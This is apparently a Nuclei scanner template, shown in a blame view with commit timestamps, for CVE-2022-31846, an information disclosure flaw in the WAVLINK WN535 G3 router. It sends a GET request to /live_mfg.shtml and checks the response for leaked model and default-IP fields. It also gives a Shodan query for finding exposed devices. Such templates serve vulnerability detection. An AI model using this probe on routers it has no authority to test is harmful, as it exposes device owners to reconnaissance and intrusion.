2022-08-14 20:13:58 +00:00
id : CVE-2022-31846
info :
2022-08-15 05:44:56 +00:00
name : WAVLINK WN535 G3 - Information Disclosure
2022-08-14 20:13:58 +00:00
author : arafatansari
2022-08-15 05:44:56 +00:00
severity : high
2022-08-14 20:13:58 +00:00
description : |
2023-02-03 17:33:55 +00:00
WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
2022-08-14 20:13:58 +00:00
reference :
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md
2022-08-15 23:07:58 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
2023-02-03 16:41:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31846
2022-08-15 05:44:56 +00:00
classification :
2022-08-15 23:07:58 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-15 05:44:56 +00:00
cve-id : CVE-2022-31846
2022-08-15 23:07:58 +00:00
cwe-id : CWE-668
2022-08-14 20:13:58 +00:00
metadata :
shodan-query : http.html:"Wavlink"
2022-08-15 23:07:58 +00:00
verified : "true"
2022-08-15 05:44:56 +00:00
tags : cve,cve2022,wavlink,exposure
2022-08-14 20:13:58 +00:00
requests :
2022-08-15 06:38:00 +00:00
- method : GET
path :
- "{{BaseURL}}/live_mfg.shtml"
2022-08-14 20:13:58 +00:00
matchers-condition : and
matchers :
- type : word
words :
2022-08-15 22:54:34 +00:00
- 'Model='
- 'DefaultIP='
- 'LOGO1='
2022-08-15 05:44:56 +00:00
condition : and
- type : status
status :
- 200
2023-02-03 16:41:14 +00:00
# Enhanced by md on 2023/02/03